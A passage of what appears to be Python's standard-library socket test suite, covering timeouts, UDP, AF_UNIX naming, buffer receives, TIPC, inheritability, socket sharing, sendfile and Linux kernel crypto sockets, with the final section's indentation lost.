                         'test needs signal.alarm()')
    def testInterruptedTimeout(self):
        # XXX I don't know how to do this test on MSWindows or any other
        # platform that doesn't support signal.alarm() or os.kill(), though
        # the bug should have existed on all platforms.
        self.serv.settimeout(5.0)   # must be longer than alarm

        class Alarm(Exception):
            pass

        def alarm_handler(signal, frame):
            raise Alarm

        old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
        try:
            try:
                signal.alarm(2)    # POSIX allows alarm to be up to 1 second early
                foo = self.serv.accept()
            except socket.timeout:
                self.fail("caught timeout instead of Alarm")
            except Alarm:
                pass
            except:
                self.fail("caught other exception instead of Alarm:"
                          " %s(%s):\n%s" %
                          (sys.exc_info()[:2] + (traceback.format_exc(),)))
            else:
                self.fail("nothing caught")
            finally:
                signal.alarm(0)         # shut off alarm
        except Alarm:
            self.fail("got Alarm in wrong place")
        finally:
            # no alarm can be pending.  Safe to restore old handler.
            signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
    """Timeout behaviour of blocking calls on a UDP socket."""

    def testUDPTimeout(self):
        def raise_timeout(*args, **kwargs):
            self.serv.settimeout(1.0)
            self.serv.recv(1024)
        self.assertRaises(socket.timeout, raise_timeout,
                          "Error generating a timeout exception (UDP)")

    def testTimeoutZero(self):
        # A timeout of 0 means non-blocking: recv() with no pending
        # datagram must raise OSError immediately, not socket.timeout.
        ok = False
        try:
            self.serv.settimeout(0.0)
            foo = self.serv.recv(1024)
        except socket.timeout:
            self.fail("caught timeout instead of error (UDP)")
        except OSError:
            ok = True
        except:
            self.fail("caught unexpected exception (UDP)")
        if not ok:
            self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
    """Sanity checks on the socket exception hierarchy and bad-fd handling."""

    def testExceptionTree(self):
        # Every socket-specific exception derives from OSError,
        # and OSError itself from Exception.
        self.assertTrue(issubclass(OSError, Exception))
        for exc in (socket.herror, socket.gaierror, socket.timeout):
            self.assertTrue(issubclass(exc, OSError))

    def test_setblocking_invalidfd(self):
        # Regression test for issue #28471
        original = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        duplicate = socket.socket(
            socket.AF_INET, socket.SOCK_STREAM, 0, original.fileno())
        original.close()
        self.addCleanup(duplicate.detach)

        # The fd was closed via the first socket object, so operating on
        # the second object must fail.
        with self.assertRaises(OSError):
            duplicate.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
    """AF_UNIX sockets bound in the Linux abstract namespace (leading NUL)."""

    UNIX_PATH_MAX = 108

    def testLinuxAbstractNamespace(self):
        address = b"\x00python-test-hello\x00\xff"
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as listener:
            listener.bind(address)
            listener.listen()
            with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as client:
                client.connect(listener.getsockname())
                with listener.accept()[0] as accepted:
                    # Both endpoints must report the abstract address.
                    self.assertEqual(listener.getsockname(), address)
                    self.assertEqual(client.getpeername(), address)

    def testMaxName(self):
        # A name of exactly UNIX_PATH_MAX bytes (NUL included) still binds.
        address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
            sock.bind(address)
            self.assertEqual(sock.getsockname(), address)

    def testNameOverflow(self):
        # One byte over the limit must be rejected.
        address = "\x00" + "h" * self.UNIX_PATH_MAX
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
            self.assertRaises(OSError, sock.bind, address)

    def testStrName(self):
        # Check that an abstract name can be passed as a string.
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        try:
            sock.bind("\x00python\x00test\x00")
            self.assertEqual(sock.getsockname(), b"\x00python\x00test\x00")
        finally:
            sock.close()

    def testBytearrayName(self):
        # Check that an abstract name can be passed as a bytearray.
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
            sock.bind(bytearray(b"\x00python\x00test\x00"))
            self.assertEqual(sock.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
    """Binding AF_UNIX sockets to filesystem pathnames in various encodings."""

    def setUp(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)

    def tearDown(self):
        self.sock.close()

    def encoded(self, path):
        # Return the given path encoded in the file system encoding,
        # or skip the test if this is not possible.
        try:
            return os.fsencode(path)
        except UnicodeEncodeError:
            self.skipTest(
                "Pathname {0!a} cannot be represented in file "
                "system encoding {1!r}".format(
                    path, sys.getfilesystemencoding()))

    def bind(self, sock, path):
        # Bind the socket
        try:
            support.bind_unix_socket(sock, path)
        except OSError as e:
            if str(e) == "AF_UNIX path too long":
                # Platform limit on sun_path length; not a test failure.
                self.skipTest(
                    "Pathname {0!a} is too long to serve as an AF_UNIX path"
                    .format(path))
            else:
                raise

    def testUnbound(self):
        # Issue #30205 (note getsockname() can return None on OS X)
        self.assertIn(self.sock.getsockname(), ('', None))

    def testStrAddr(self):
        # Test binding to and retrieving a normal string pathname.
        path = os.path.abspath(support.TESTFN)
        self.bind(self.sock, path)
        self.addCleanup(support.unlink, path)
        self.assertEqual(self.sock.getsockname(), path)

    def testBytesAddr(self):
        # Test binding to a bytes pathname.
        path = os.path.abspath(support.TESTFN)
        self.bind(self.sock, self.encoded(path))
        self.addCleanup(support.unlink, path)
        self.assertEqual(self.sock.getsockname(), path)

    def testSurrogateescapeBind(self):
        # Test binding to a valid non-ASCII pathname, with the
        # non-ASCII bytes supplied using surrogateescape encoding.
        path = os.path.abspath(support.TESTFN_UNICODE)
        b = self.encoded(path)
        self.bind(self.sock, b.decode("ascii", "surrogateescape"))
        self.addCleanup(support.unlink, path)
        self.assertEqual(self.sock.getsockname(), path)

    def testUnencodableAddr(self):
        # Test binding to a pathname that cannot be encoded in the
        # file system encoding.
        if support.TESTFN_UNENCODABLE is None:
            self.skipTest("No unencodable filename available")
        path = os.path.abspath(support.TESTFN_UNENCODABLE)
        self.bind(self.sock, path)
        self.addCleanup(support.unlink, path)
        self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
    """
    Test the buffer versions of socket.recv() and socket.send().
    """
    def __init__(self, methodName='runTest'):
        SocketConnectedTest.__init__(self, methodName=methodName)

    def testRecvIntoArray(self):
        # recv_into() must fill a writable array.array buffer in place.
        buf = array.array("B", [0] * len(MSG))
        nbytes = self.cli_conn.recv_into(buf)
        self.assertEqual(nbytes, len(MSG))
        buf = buf.tobytes()
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)

    def _testRecvIntoArray(self):
        # Client side shared by all recv_into tests: send MSG once.
        buf = bytes(MSG)
        self.serv_conn.send(buf)

    def testRecvIntoBytearray(self):
        buf = bytearray(1024)
        nbytes = self.cli_conn.recv_into(buf)
        self.assertEqual(nbytes, len(MSG))
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)

    _testRecvIntoBytearray = _testRecvIntoArray

    def testRecvIntoMemoryview(self):
        buf = bytearray(1024)
        nbytes = self.cli_conn.recv_into(memoryview(buf))
        self.assertEqual(nbytes, len(MSG))
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)

    _testRecvIntoMemoryview = _testRecvIntoArray

    def testRecvFromIntoArray(self):
        buf = array.array("B", [0] * len(MSG))
        nbytes, addr = self.cli_conn.recvfrom_into(buf)
        self.assertEqual(nbytes, len(MSG))
        buf = buf.tobytes()
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)

    def _testRecvFromIntoArray(self):
        buf = bytes(MSG)
        self.serv_conn.send(buf)

    def testRecvFromIntoBytearray(self):
        buf = bytearray(1024)
        nbytes, addr = self.cli_conn.recvfrom_into(buf)
        self.assertEqual(nbytes, len(MSG))
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)

    _testRecvFromIntoBytearray = _testRecvFromIntoArray

    def testRecvFromIntoMemoryview(self):
        buf = bytearray(1024)
        nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
        self.assertEqual(nbytes, len(MSG))
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)

    _testRecvFromIntoMemoryview = _testRecvFromIntoArray

    def testRecvFromIntoSmallBuffer(self):
        # See issue #20246: requesting more bytes than the buffer holds
        # must raise ValueError rather than overflow the buffer.
        buf = bytearray(8)
        self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)

    def _testRecvFromIntoSmallBuffer(self):
        self.serv_conn.send(MSG)

    def testRecvFromIntoEmptyBuffer(self):
        buf = bytearray()
        self.cli_conn.recvfrom_into(buf)
        self.cli_conn.recvfrom_into(buf, 0)

    _testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
# Addressing parameters shared by the TIPC tests below: service type and
# the lower/upper bounds of the published name sequence.
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
    """Check if the TIPC module is loaded

    The TIPC module is not loaded automatically on Ubuntu and probably
    other Linux distros.
    """
    if not hasattr(socket, "AF_TIPC"):
        return False
    try:
        modules = open("/proc/modules")
    except (FileNotFoundError, IsADirectoryError, PermissionError):
        # It's ok if the file does not exist, is a directory or if we
        # have not the permission to read it.
        return False
    with modules:
        return any(line.startswith("tipc ") for line in modules)
@unittest.skipUnless(isTipcAvailable(),
                     "TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
    """Datagram (SOCK_RDM) round trip over AF_TIPC."""

    def testRDM(self):
        srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
        cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
        self.addCleanup(srv.close)
        self.addCleanup(cli.close)

        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # Publish a name sequence covering [TIPC_LOWER, TIPC_UPPER].
        srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
                TIPC_LOWER, TIPC_UPPER)
        srv.bind(srvaddr)

        # Send to a single name in the middle of the published range.
        sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
                TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
        cli.sendto(MSG, sendaddr)

        msg, recvaddr = srv.recvfrom(1024)

        self.assertEqual(cli.getsockname(), recvaddr)
        self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
                     "TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
    """Stream (SOCK_STREAM) round trip over AF_TIPC with a threaded client."""

    def __init__(self, methodName = 'runTest'):
        unittest.TestCase.__init__(self, methodName = methodName)
        ThreadableTest.__init__(self)

    def setUp(self):
        self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
        self.addCleanup(self.srv.close)
        self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
                TIPC_LOWER, TIPC_UPPER)
        self.srv.bind(srvaddr)
        self.srv.listen()
        # Tell the client thread the server is ready before blocking
        # in accept().
        self.serverExplicitReady()
        self.conn, self.connaddr = self.srv.accept()
        self.addCleanup(self.conn.close)

    def clientSetUp(self):
        # There is a hittable race between serverExplicitReady() and the
        # accept() call; sleep a little while to avoid it, otherwise
        # we could get an exception
        time.sleep(0.1)
        self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
        self.addCleanup(self.cli.close)
        addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
                TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
        self.cli.connect(addr)
        self.cliaddr = self.cli.getsockname()

    def testStream(self):
        msg = self.conn.recv(1024)
        self.assertEqual(msg, MSG)
        self.assertEqual(self.cliaddr, self.connaddr)

    def _testStream(self):
        self.cli.send(MSG)
        self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
    """Socket objects as context managers: leaving the block closes them."""

    def _testSocketClass(self):
        # base test
        with socket.socket() as sock:
            self.assertFalse(sock._closed)
        self.assertTrue(sock._closed)
        # close inside with block
        with socket.socket() as sock:
            sock.close()
        self.assertTrue(sock._closed)
        # exception inside with block
        with socket.socket() as sock:
            # sendall() on an unconnected socket raises OSError; the
            # socket must still be closed on exit.
            self.assertRaises(OSError, sock.sendall, b'foo')
        self.assertTrue(sock._closed)

    def testCreateConnectionBase(self):
        # Server side: echo one payload back to the client.
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        data = conn.recv(1024)
        conn.sendall(data)

    def _testCreateConnectionBase(self):
        address = self.serv.getsockname()
        with socket.create_connection(address) as sock:
            self.assertFalse(sock._closed)
            sock.sendall(b'foo')
            self.assertEqual(sock.recv(1024), b'foo')
        self.assertTrue(sock._closed)

    def testCreateConnectionClose(self):
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        data = conn.recv(1024)
        conn.sendall(data)

    def _testCreateConnectionClose(self):
        address = self.serv.getsockname()
        with socket.create_connection(address) as sock:
            sock.close()
        self.assertTrue(sock._closed)
        self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
    """File-descriptor inheritability of sockets (PEP 446 semantics)."""

    @unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
                         "SOCK_CLOEXEC not defined")
    @support.requires_linux_version(2, 6, 28)
    def test_SOCK_CLOEXEC(self):
        with socket.socket(socket.AF_INET,
                           socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
            # SOCK_CLOEXEC must be masked out of the reported type.
            self.assertEqual(s.type, socket.SOCK_STREAM)
            self.assertFalse(s.get_inheritable())

    def test_default_inheritable(self):
        sock = socket.socket()
        with sock:
            self.assertEqual(sock.get_inheritable(), False)

    def test_dup(self):
        sock = socket.socket()
        with sock:
            newsock = sock.dup()
            sock.close()
            with newsock:
                # dup() must not make the new fd inheritable either.
                self.assertEqual(newsock.get_inheritable(), False)

    def test_set_inheritable(self):
        sock = socket.socket()
        with sock:
            sock.set_inheritable(True)
            self.assertEqual(sock.get_inheritable(), True)

            sock.set_inheritable(False)
            self.assertEqual(sock.get_inheritable(), False)

    @unittest.skipIf(fcntl is None, "need fcntl")
    def test_get_inheritable_cloexec(self):
        sock = socket.socket()
        with sock:
            fd = sock.fileno()
            self.assertEqual(sock.get_inheritable(), False)

            # clear FD_CLOEXEC flag
            flags = fcntl.fcntl(fd, fcntl.F_GETFD)
            flags &= ~fcntl.FD_CLOEXEC
            fcntl.fcntl(fd, fcntl.F_SETFD, flags)

            # get_inheritable() must reflect the flag change made via fcntl.
            self.assertEqual(sock.get_inheritable(), True)

    @unittest.skipIf(fcntl is None, "need fcntl")
    def test_set_inheritable_cloexec(self):
        sock = socket.socket()
        with sock:
            fd = sock.fileno()
            self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
                             fcntl.FD_CLOEXEC)

            sock.set_inheritable(True)
            # set_inheritable(True) must clear FD_CLOEXEC on the fd.
            self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
                             0)

    def test_socketpair(self):
        s1, s2 = socket.socketpair()
        self.addCleanup(s1.close)
        self.addCleanup(s2.close)
        self.assertEqual(s1.get_inheritable(), False)
        self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
                     "SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
    """Interaction of SOCK_NONBLOCK with timeouts and blocking mode."""

    def checkNonblock(self, s, nonblock=True, timeout=0.0):
        # Verify that the socket's reported type, timeout, O_NONBLOCK fd
        # flag and getblocking() all agree with the expected mode.
        if nonblock:
            self.assertEqual(s.type, socket.SOCK_STREAM)
            self.assertEqual(s.gettimeout(), timeout)
            self.assertTrue(
                fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
            if timeout == 0:
                # timeout == 0: means that getblocking() must be False.
                self.assertFalse(s.getblocking())
            else:
                # If timeout > 0, the socket will be in a "blocking" mode
                # from the standpoint of the Python API.  For Python socket
                # object, "blocking" means that operations like 'sock.recv()'
                # will block.  Internally, file descriptors for
                # "blocking" Python sockets *with timeouts* are in a
                # *non-blocking* mode, and 'sock.recv()' uses 'select()'
                # and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
                self.assertTrue(s.getblocking())
        else:
            self.assertEqual(s.type, socket.SOCK_STREAM)
            self.assertEqual(s.gettimeout(), None)
            self.assertFalse(
                fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
            self.assertTrue(s.getblocking())

    @support.requires_linux_version(2, 6, 28)
    def test_SOCK_NONBLOCK(self):
        # a lot of it seems silly and redundant, but I wanted to test that
        # changing back and forth worked ok
        with socket.socket(socket.AF_INET,
                           socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
            self.checkNonblock(s)
            s.setblocking(1)
            self.checkNonblock(s, nonblock=False)
            s.setblocking(0)
            self.checkNonblock(s)
            s.settimeout(None)
            self.checkNonblock(s, nonblock=False)
            s.settimeout(2.0)
            self.checkNonblock(s, timeout=2.0)
            s.setblocking(1)
            self.checkNonblock(s, nonblock=False)
        # defaulttimeout: new sockets must pick up the module-wide default.
        t = socket.getdefaulttimeout()
        socket.setdefaulttimeout(0.0)
        with socket.socket() as s:
            self.checkNonblock(s)
        socket.setdefaulttimeout(None)
        with socket.socket() as s:
            self.checkNonblock(s, False)
        socket.setdefaulttimeout(2.0)
        with socket.socket() as s:
            self.checkNonblock(s, timeout=2.0)
        socket.setdefaulttimeout(None)
        with socket.socket() as s:
            self.checkNonblock(s, False)
        # Restore whatever default was in effect before the test.
        socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
    """Windows-only tests for socket.share()/socket.fromshare()."""

    # This must be classmethod and not staticmethod or multiprocessing
    # won't be able to bootstrap it.
    @classmethod
    def remoteProcessServer(cls, q):
        # Recreate socket from shared data
        sdata = q.get()
        message = q.get()

        s = socket.fromshare(sdata)
        s2, c = s.accept()

        # Send the message
        s2.sendall(message)
        s2.close()
        s.close()

    def testShare(self):
        # Transfer the listening server socket to another process
        # and service it from there.

        # Create process:
        q = multiprocessing.Queue()
        p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
        p.start()

        # Get the shared socket data
        data = self.serv.share(p.pid)

        # Pass the shared socket to the other process
        addr = self.serv.getsockname()
        self.serv.close()
        q.put(data)

        # The data that the server will send us
        message = b"slapmahfro"
        q.put(message)

        # Connect
        s = socket.create_connection(addr)
        #  listen for the data
        m = []
        while True:
            data = s.recv(100)
            if not data:
                break
            m.append(data)
        s.close()
        received = b"".join(m)
        self.assertEqual(received, message)
        p.join()

    def testShareLength(self):
        # Truncated or padded share data must be rejected.
        data = self.serv.share(os.getpid())
        self.assertRaises(ValueError, socket.fromshare, data[:-1])
        self.assertRaises(ValueError, socket.fromshare, data+b"foo")

    def compareSockets(self, org, other):
        # socket sharing is expected to work only for blocking socket
        # since the internal python timeout value isn't transferred.
        self.assertEqual(org.gettimeout(), None)
        self.assertEqual(org.gettimeout(), other.gettimeout())

        self.assertEqual(org.family, other.family)
        self.assertEqual(org.type, other.type)
        # If the user specified "0" for proto, then
        # internally windows will have picked the correct value.
        # Python introspection on the socket however will still return
        # 0.  For the shared socket, the python value is recreated
        # from the actual value, so it may not compare correctly.
        if org.proto != 0:
            self.assertEqual(org.proto, other.proto)

    def testShareLocal(self):
        data = self.serv.share(os.getpid())
        s = socket.fromshare(data)
        try:
            self.compareSockets(self.serv, s)
        finally:
            s.close()

    def testTypes(self):
        families = [socket.AF_INET, socket.AF_INET6]
        types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
        for f in families:
            for t in types:
                try:
                    source = socket.socket(f, t)
                except OSError:
                    continue # This combination is not supported
                try:
                    data = source.share(os.getpid())
                    shared = socket.fromshare(data)
                    try:
                        self.compareSockets(source, shared)
                    finally:
                        shared.close()
                finally:
                    source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
    """
    Test the send() implementation of socket.sendfile().

    Client-side ``_test*`` methods run in a separate thread and push the
    file; the paired server-side ``test*`` methods receive and verify.
    """
    FILESIZE = (10 * 1024 * 1024)  # 10 MiB
    BUFSIZE = 8192
    FILEDATA = b""
    TIMEOUT = 2

    @classmethod
    def setUpClass(cls):
        # Create a FILESIZE-byte file of repeated random ASCII letters
        # and keep its contents for later comparison.
        def chunks(total, step):
            assert total >= step
            while total > step:
                yield step
                total -= step
            if total:
                yield total

        chunk = b"".join([random.choice(string.ascii_letters).encode()
                          for i in range(cls.BUFSIZE)])
        with open(support.TESTFN, 'wb') as f:
            for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
                f.write(chunk)
        with open(support.TESTFN, 'rb') as f:
            cls.FILEDATA = f.read()
            assert len(cls.FILEDATA) == cls.FILESIZE

    @classmethod
    def tearDownClass(cls):
        support.unlink(support.TESTFN)

    def accept_conn(self):
        self.serv.settimeout(self.TIMEOUT)
        conn, addr = self.serv.accept()
        conn.settimeout(self.TIMEOUT)
        self.addCleanup(conn.close)
        return conn

    def recv_data(self, conn):
        # Drain the connection until the peer closes it.
        received = []
        while True:
            chunk = conn.recv(self.BUFSIZE)
            if not chunk:
                break
            received.append(chunk)
        return b''.join(received)

    def meth_from_sock(self, sock):
        # Depending on the mixin class being run return either send()
        # or sendfile() method implementation.
        return getattr(sock, "_sendfile_use_send")

    # regular file

    def _testRegularFile(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address) as sock, file as file:
            meth = self.meth_from_sock(sock)
            sent = meth(file)
            self.assertEqual(sent, self.FILESIZE)
            self.assertEqual(file.tell(), self.FILESIZE)

    def testRegularFile(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), self.FILESIZE)
        self.assertEqual(data, self.FILEDATA)

    # non regular file

    def _testNonRegularFile(self):
        address = self.serv.getsockname()
        file = io.BytesIO(self.FILEDATA)
        with socket.create_connection(address) as sock, file as file:
            sent = sock.sendfile(file)
            self.assertEqual(sent, self.FILESIZE)
            self.assertEqual(file.tell(), self.FILESIZE)
            # A BytesIO has no fileno(), so os.sendfile() cannot be used.
            self.assertRaises(socket._GiveupOnSendfile,
                              sock._sendfile_use_sendfile, file)

    def testNonRegularFile(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), self.FILESIZE)
        self.assertEqual(data, self.FILEDATA)

    # empty file

    def _testEmptyFileSend(self):
        address = self.serv.getsockname()
        filename = support.TESTFN + "2"
        with open(filename, 'wb'):
            self.addCleanup(support.unlink, filename)
        file = open(filename, 'rb')
        with socket.create_connection(address) as sock, file as file:
            meth = self.meth_from_sock(sock)
            sent = meth(file)
            self.assertEqual(sent, 0)
            self.assertEqual(file.tell(), 0)

    def testEmptyFileSend(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(data, b"")

    # offset

    def _testOffset(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address) as sock, file as file:
            meth = self.meth_from_sock(sock)
            sent = meth(file, offset=5000)
            self.assertEqual(sent, self.FILESIZE - 5000)
            self.assertEqual(file.tell(), self.FILESIZE)

    def testOffset(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), self.FILESIZE - 5000)
        self.assertEqual(data, self.FILEDATA[5000:])

    # count

    def _testCount(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address, timeout=2) as sock, file as file:
            count = 5000007
            meth = self.meth_from_sock(sock)
            sent = meth(file, count=count)
            self.assertEqual(sent, count)
            self.assertEqual(file.tell(), count)

    def testCount(self):
        count = 5000007
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), count)
        self.assertEqual(data, self.FILEDATA[:count])

    # count small

    def _testCountSmall(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address, timeout=2) as sock, file as file:
            count = 1
            meth = self.meth_from_sock(sock)
            sent = meth(file, count=count)
            self.assertEqual(sent, count)
            self.assertEqual(file.tell(), count)

    def testCountSmall(self):
        count = 1
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), count)
        self.assertEqual(data, self.FILEDATA[:count])

    # count + offset

    def _testCountWithOffset(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address, timeout=2) as sock, file as file:
            count = 100007
            meth = self.meth_from_sock(sock)
            sent = meth(file, offset=2007, count=count)
            self.assertEqual(sent, count)
            self.assertEqual(file.tell(), count + 2007)

    def testCountWithOffset(self):
        count = 100007
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), count)
        self.assertEqual(data, self.FILEDATA[2007:count+2007])

    # non blocking sockets are not supposed to work

    def _testNonBlocking(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address) as sock, file as file:
            sock.setblocking(False)
            meth = self.meth_from_sock(sock)
            self.assertRaises(ValueError, meth, file)
            self.assertRaises(ValueError, sock.sendfile, file)

    def testNonBlocking(self):
        conn = self.accept_conn()
        if conn.recv(8192):
            self.fail('was not supposed to receive any data')

    # timeout (non-triggered)

    def _testWithTimeout(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address, timeout=2) as sock, file as file:
            meth = self.meth_from_sock(sock)
            sent = meth(file)
            self.assertEqual(sent, self.FILESIZE)

    def testWithTimeout(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), self.FILESIZE)
        self.assertEqual(data, self.FILEDATA)

    # timeout (triggered)

    def _testWithTimeoutTriggeredSend(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        # A very small timeout with a server that does not drain the
        # stream should make the send side time out.
        with socket.create_connection(address, timeout=0.01) as sock, \
                file as file:
            meth = self.meth_from_sock(sock)
            self.assertRaises(socket.timeout, meth, file)

    def testWithTimeoutTriggeredSend(self):
        conn = self.accept_conn()
        conn.recv(88192)

    # errors

    def _test_errors(self):
        pass

    def test_errors(self):
        with open(support.TESTFN, 'rb') as file:
            with socket.socket(type=socket.SOCK_DGRAM) as s:
                meth = self.meth_from_sock(s)
                self.assertRaisesRegex(
                    ValueError, "SOCK_STREAM", meth, file)
        with open(support.TESTFN, 'rt') as file:
            with socket.socket() as s:
                meth = self.meth_from_sock(s)
                self.assertRaisesRegex(
                    ValueError, "binary mode", meth, file)
        with open(support.TESTFN, 'rb') as file:
            with socket.socket() as s:
                meth = self.meth_from_sock(s)
                self.assertRaisesRegex(TypeError, "positive integer",
                                       meth, file, count='2')
                self.assertRaisesRegex(TypeError, "positive integer",
                                       meth, file, count=0.1)
                self.assertRaisesRegex(ValueError, "positive integer",
                                       meth, file, count=0)
                self.assertRaisesRegex(ValueError, "positive integer",
                                       meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
                     'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
    """
    Test the sendfile() implementation of socket.sendfile().
    """
    def meth_from_sock(self, sock):
        # Exercise the zero-copy os.sendfile() path instead of send().
        return sock._sendfile_use_sendfile
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
